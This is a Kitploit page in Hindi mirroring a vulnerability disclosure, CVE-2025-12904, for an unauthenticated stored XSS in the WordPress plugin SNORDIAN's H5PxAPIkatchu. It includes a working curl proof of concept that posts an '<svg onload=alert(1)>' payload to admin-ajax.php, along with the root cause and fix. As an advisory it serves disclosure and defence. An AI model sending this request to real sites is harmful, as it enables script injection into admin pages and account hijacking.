Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — CVE-2025-12904 के लिए प्रकटीकरण | Kitploit
उपकरण/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

CVE-2025-12904 के लिए प्रकटीकरण

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SNORDIAN-H5PxAPIkatchu-CVE-रिपोर्ट

CVE-2025-12904 का प्रकटीकरण

CVE-2025-12904 - SNORDIAN's H5PxAPIkatchu में भेद्यता

यह रिपॉजिटरी SNORDIAN's H5PxAPIkatchu <= 0.4.16,वर्डप्रेस प्लगइन जिसे otacke ने विकसित किया है, में पाई गई एक भेद्यता का खुलासा करता है।

🛠 प्रभावित संस्करण

  • उत्पाद: SNORDIAN's H5PxAPIkatchu
  • संस्करण: v0.4.16
  • URL: https://wordpress.org/plugins/h5pxapikatchu/

🔒 निर्धारित CVE

CVE IDप्रकारघटकप्रभाव
CVE-2025-12904insert_data के माध्यम से अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंगclass-table-view.phpप्रमाणित हमलावर JS निष्पादित कर सकता है

🧾 विस्तृत विवरण

CVE-2025-12904 — insert_data के माध्यम से अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग

  • प्रभावित घटक: h5pxapikatchu एडमिन पेज
  • आक्रमण वेक्टर: POST अनुरोध के माध्यम से अप्रमाणित
  • ट्रिगर: एक हमलावर मनमानी स्क्रिप्ट संग्रहीत करने के लिए insert_data क्रिया का शोषण करके एडमिन इंटरफेस में दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट कर सकता है।
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※यदि ऑब्जेक्ट के अंदर का id मौजूद नहीं है, तो यह विफल हो जाएगा।

  • प्रभाव: संग्रहीत स्क्रिप्ट निष्पादित हो सकती हैं, जिससे खाता अपहरण जैसी गंभीर हानि का जोखिम हो सकता है।

❓भेद्यता का कारण

insert_data() फ़ंक्शन ने कोई अनुमति जांच नहीं की, जिससे बिना प्रमाणीकरण के दुर्भावनापूर्ण इनपुट सहेजा जा सका। इसके अलावा, ये प्रविष्टियाँ प्रशासन इंटरफ़ेस पर बिना एस्केप किए प्रदर्शित की गईं।

  • insert_data() फ़ंक्शन अनधिकृत निष्पादन को रोकने के लिए current_user_can का उपयोग करता है।
  • echo $value के बजाय esc_html($value) का उपयोग करके, आप XSS निष्पादन को रोक सकते हैं।

ひとこと

PoC बनाना बहुत कठिन था।

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

इस भाग को दोहराने में बहुत समय लगा। curl कमांड को और अधिक कुशलता से उपयोग करना सीखना चाहता हूँ। और यह प्लगइन... क्या सब ठीक है? खासकर नाम, और वैसे भी, सा।

🔍 खोजकर्ता

नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध


📚 संदर्भ

  • उत्पाद: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ लाइसेंस

यह सलाह सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय सहित साझा करने के लिए स्वतंत्र।

टूल डाउनलोड करें